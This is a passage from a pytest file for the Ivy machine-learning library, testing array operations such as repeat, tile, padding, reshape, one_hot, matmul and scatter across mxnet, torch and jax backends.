"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
        # mxnet only supports repeats defined as an int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
        # mxnet only supports repeats defined as an int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# compilation test
if call in [helpers.torch_call]:
        # pytorch scripting does not support a union of types
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.repeat)
# tile
@pytest.mark.parametrize(
"x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw = x_n_reps
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.tile(x, reps_raw)
reps = ivy.array(reps_raw, 'int32', dev)
ret = ivy.tile(x, reps)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
else:
expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.tile, x, reps),
np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.tile)
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zero_pad)
# fourier_encode
@pytest.mark.parametrize(
"x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
[[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
-8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
-6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
1.0000000e+00]],
[[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
-2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
-1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
1.0000000e+00]],
[[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
-6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
-3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
1.0000000e+00]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# smoke test
x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
if isinstance(max_freq, list):
max_freq = tensor_fn(max_freq, dtype, dev)
ret = ivy.fourier_encode(x, max_freq, num_bands)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else list(x.shape)
expected_shape = x_shape + [1 + 2*num_bands]
assert list(ret.shape) == expected_shape
# value test
assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.fourier_encode)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.constant_pad)
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.swapaxes)
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.transpose)
# expand_dims
@pytest.mark.parametrize(
"x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.expand_dims(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape.insert(axis, 1)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.expand_dims)
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support .type() method
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.where)
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.indices_where)
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isnan)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isinf)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isfinite)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.reshape)
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.broadcast_to)
# squeeze
@pytest.mark.parametrize(
"x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.squeeze(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if axis is None:
expected_shape = [item for item in x.shape if item != 1]
elif x.shape == ():
expected_shape = []
else:
expected_shape = list(x.shape)
expected_shape.pop(axis)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.squeeze)
# zeros
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros(shape, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.zeros(shape, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zeros)
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zeros_like)
# ones
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ones(shape, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.ones(shape, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones)
# ones_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ones_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.ones_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ones_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones_like)
# full
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"fill_val", [2., -7.])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.full(shape, fill_val, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
        helpers.assert_compilable(ivy.full)
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.one_hot)
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cross)
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.matmul)
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cumsum)
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cumprod)
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.identity)
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
# compilation test
if call is helpers.torch_call:
# torch scripting can't take variable number of arguments or use keyword-only arguments with defaults
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.meshgrid)
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size", [([0, 4, 1, 2], [1, 2, 3, 4], 8), ([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size, red, dtype, tensor_fn, dev, call):
# smoke test
if (red == 'sum' or red == 'min' or red == 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
if red == 'replace' and call is not helpers.mx_call:
# mxnet is the only backend which supports the replace reduction
pytest.skip()
inds, upd, size = inds_n_upd_n_size
